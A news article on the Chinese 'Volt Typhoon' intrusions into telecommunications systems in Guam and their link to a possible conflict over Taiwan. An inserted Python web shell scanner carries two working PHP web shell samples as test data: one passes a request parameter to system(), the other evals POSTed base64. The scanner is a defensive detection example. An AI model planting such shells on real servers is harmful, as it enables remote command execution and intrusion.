Chinese Malware Hits Systems in Guam. Is Taiwan the Real Target? (2023)

The code, which Microsoft says was installed by a Chinese government hacking group, has raised alarm as Guam would be the centerpiece of any US military response to a move against Taiwan.


By David E. Sanger

David E. Sanger, reporting from Washington, wrote extensively on the role of cyber conflict in national security.

Around the time the F.B.I. was examining the equipment recovered from a Chinese spy balloon shot down off the South Carolina coast in February, American intelligence agencies and Microsoft detected a more troubling intruder: mysterious computer code that had appeared in telecommunications systems in Guam and elsewhere in the United States.

The code, which Microsoft says was installed by a Chinese government hacking group, has raised alarm because Guam, with its Pacific ports and vast American air base, would be the centerpiece of any U.S. military response to an invasion or blockade of Taiwan. The operation was conducted with great stealth, sometimes routing its traffic through home routers and other common internet-connected consumer devices so that the intrusion would be harder to trace back to its source.

The code is known as a "web shell": in this case a malicious script that gives an attacker remote access to a compromised server. Home routers are particularly vulnerable, especially older models whose software and security settings are no longer updated; once compromised, they let the attacker's connections appear to come from ordinary residential addresses rather than from overseas.
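As an added illustration (not part of the article, and not code from Microsoft's or the agencies' reports, which are not reproduced here), the following Python shows what a web shell looks like and how a first-pass indicator scan for one works. The PHP samples are constructed for this example; the scanner flags the tell-tale pairing of request input (`$_GET`, `$_POST`, `$_REQUEST`, `$_COOKIE`) flowing into a PHP command- or code-execution function, and deliberately does not flag command execution whose arguments are fixed. It makes no claim about the specific implant described in the article.

```python
"""
Added example: the anatomy of a PHP web shell and a simple indicator scan.

A web shell is a script dropped onto a web server that turns an HTTP
request parameter into command or code execution.  The scanner below
looks for request input flowing into an execution function.  Real
implants are frequently obfuscated, so treat this as a triage heuristic
for hunting, not a definitive detector.
"""
from __future__ import annotations

import re

# Constructed sample files for the example (not real captured implants).
SAMPLE_FILES: dict[str, str] = {
    # Classic one-line shell: ?cmd=... is passed straight to system().
    "uploads/shell.php": (
        '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; '
        'system($_REQUEST["cmd"]); echo "</pre>"; } ?>'
    ),
    # Code-execution variant: POSTed base64 is decoded and eval'd.
    "uploads/ev.php": '<?php @eval(base64_decode($_POST["x"])); ?>',
    # Benign: request input is used, but only echoed after escaping.
    "index.php": '<?php echo "Welcome, " . htmlspecialchars($_GET["name"] ?? "guest"); ?>',
    # Benign: command execution, but with a fixed argument, not request input.
    "lib/helper.php": '<?php function run_backup() { return shell_exec("/usr/local/bin/backup.sh"); } ?>',
}

# PHP functions that execute OS commands or evaluate PHP code.
EXEC_FUNCS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# PHP superglobals that carry attacker-controlled request data.
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)")

# An execution call and its argument expression, up to the end of the statement.
# The non-greedy [^;]*? keeps the match inside a single statement so that a
# decoder wrapper such as base64_decode(...) is captured along with its input.
EXEC_CALL = re.compile(EXEC_FUNCS + r"\s*\(([^;]*?)\)\s*;", re.IGNORECASE)


def find_webshell_indicators(source: str) -> list[str]:
    """Return human-readable findings for one file's contents.

    A finding is produced only when request input appears inside the
    argument list of an execution function.
    """
    findings: list[str] = []
    for match in EXEC_CALL.finditer(source):
        args = match.group(1)
        if REQUEST_INPUT.search(args):
            func_name = match.group(0).split("(")[0].strip()
            findings.append(f"request input passed to {func_name}()")
    return findings


def scan(files: dict[str, str]) -> dict[str, list[str]]:
    """Scan a {path: contents} mapping and return only the files with findings."""
    results: dict[str, list[str]] = {}
    for path, content in files.items():
        hits = find_webshell_indicators(content)
        if hits:
            results[path] = hits
    return results


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_FILES).items():
        for hit in hits:
            print(f"{path}: {hit}")
```

Run as a script it reports only `uploads/shell.php` and `uploads/ev.php`; `index.php` (request input that is escaped and echoed, never executed) and `lib/helper.php` (execution with a fixed argument) produce nothing. In practice a scan like this would be run over a web root's files and its hits triaged by hand, since heavily obfuscated shells will evade a regex of this kind.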

Unlike the balloon, which fascinated Americans as it pirouetted over sensitive nuclear sites, the computer code could not be shot down on live television. Instead, Microsoft on Wednesday published details of the code that would make it possible for corporate users, manufacturers and others to detect and remove it. In a coordinated release, the National Security Agency, along with other domestic agencies and counterparts in Australia, Britain, New Zealand and Canada, published a 24-page advisory that referred to Microsoft's findings and offered broader warnings about a "newly discovered cluster of activity" from China.

Microsoft has dubbed the hacking group "Volt Typhoon" and said it is part of a state-backed Chinese effort aimed not only at critical infrastructure such as communications, electric and gas utilities, but also at maritime and transportation operations. For now, the intrusions appeared to be an espionage campaign. But the Chinese could use the code, which is designed to pierce firewalls, to enable destructive attacks if they chose.

So far, Microsoft says, there is no evidence that the Chinese group has used the access for any offensive attacks. Unlike Russian groups, Chinese intelligence and military hackers have tended to prioritize espionage.

In interviews, administration officials said they believed the code was part of a massive Chinese intelligence effort spanning cyberspace, outer space and, as the Americans discovered after the balloon incident, the lower atmosphere.

The Biden administration declined to discuss what the F.B.I. found while examining the equipment recovered from the balloon. But the craft, better described as an enormous airship, apparently contained specialized radar and communications-interception devices that the F.B.I. has been examining since the balloon was shot down.

It is not clear whether the government's silence about the balloon's payload is driven by a desire to keep the Chinese government from learning what the United States has discovered, or by a desire to get past the diplomatic rift that followed the incursion.

President Biden, speaking at a news conference in Hiroshima, Japan, on Sunday, described how the balloon incident had chilled an already frosty exchange between Washington and Beijing.

"And then this stupid balloon carrying two truckloads' worth of spy equipment flew over the United States," he told reporters, "and it was shot down and everything changed in terms of conversation."

He predicted that the relationship would soon "begin to thaw."

China has never admitted to intruding into American networks, even in the biggest example of all: the theft of the security-clearance files of some 22 million Americans, including six million sets of fingerprints, from the Office of Personnel Management during the Obama administration. That data exfiltration went on for the better part of a year and led to an agreement between President Barack Obama and President Xi Jinping that produced only a brief dip in malicious Chinese cyber activity.

On Wednesday, China issued a warning to its own companies to be on guard against American hacking. There has been plenty of that, too: documents released by Edward J. Snowden, the former N.S.A. contractor, contained evidence of American efforts to penetrate the systems of Huawei, the Chinese telecommunications giant, as well as military and leadership targets.

Telecommunications networks are key targets for hackers, and the Guam system is particularly important to China because military communications are often connected to commercial networks.

Tom Burt, who oversees Microsoft's threat intelligence unit, said in an interview that the company's analysts, many of them veterans of the National Security Agency and other intelligence agencies, found the code "while investigating intrusion activity impacting a U.S. port." As they traced the breach, they found other networks that had been compromised, "including some in the telecommunications sector in Guam."

Anne Neuberger, the deputy national security adviser for cyber and emerging technologies, said that covert activities "such as the activity exposed today are part of what drives our focus on the security of telecom networks and the urgency to use trusted vendors" whose equipment meets established cybersecurity standards.

Ms. Neuberger is leading the federal government's effort to enforce new cybersecurity standards for critical infrastructure. Officials were surprised by the extent of the gaps in such infrastructure when a Russian ransomware attack on Colonial Pipeline in 2021 cut off the flow of gasoline, diesel and jet fuel on the East Coast. In the wake of that attack, the Biden administration used the little-known powers of the Transportation Security Administration, which regulates pipelines, to force utilities to comply with a series of cybersecurity mandates.

Now, Ms. Neuberger is leading what she called "a relentless focus on improving the cybersecurity of our pipelines, rail systems, water systems and other critical services," including mandating cybersecurity practices for those sectors and working more closely with companies that have "unique visibility" into the risks to such infrastructure.

Those companies include Microsoft, Google, Amazon and many telecommunications firms that can monitor activity on domestic networks. Intelligence agencies, including the N.S.A., are barred by law from operating inside the United States. But the N.S.A. can publish warnings, as it did on Wednesday, together with the F.B.I. and the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency.

The agencies' report is part of a relatively recent push by the U.S. government to release such information quickly, in the hope of disrupting operations like the one orchestrated by the Chinese government. In years past, the United States tended to withhold such information, sometimes by classifying it, and to release it only to a select group of companies or organizations. The result, almost always, was that the hackers stayed well ahead of the government.

In this case, the focus on Guam has particularly caught the attention of officials who are assessing China's capability, and its willingness, to attack or choke off Taiwan. Mr. Xi has ordered the People's Liberation Army to be capable of taking the island by 2027. The C.I.A. director, William J. Burns, has noted to Congress that the order "does not mean that he has decided to invade."

In the dozens of tabletop exercises the United States has run in recent years to game out what such an attack might look like, one of China's first anticipated moves is to cut off American communications and slow the United States' ability to respond. The exercises therefore envision attacks on satellite and ground-based communications, especially around American installations where military assets would be mobilized.

None is bigger than Guam, where Andersen Air Force Base would be the launch point for many Air Force missions to help defend the island, and the naval port is critical for U.S. submarines.

David E. Sanger is a White House and national security correspondent. In a 38-year reporting career for The Times, he has been a member of three teams that have won Pulitzer Prizes, most recently in 2017 for international reporting. His newest book is "The Perfect Weapon: War, Sabotage and Fear in the Cyber Age." @SangerNYT

A version of this article appears in print in the New York edition with the headline: China-Linked Malware Hits Systems in Guam. Is Taiwan the Real Target?

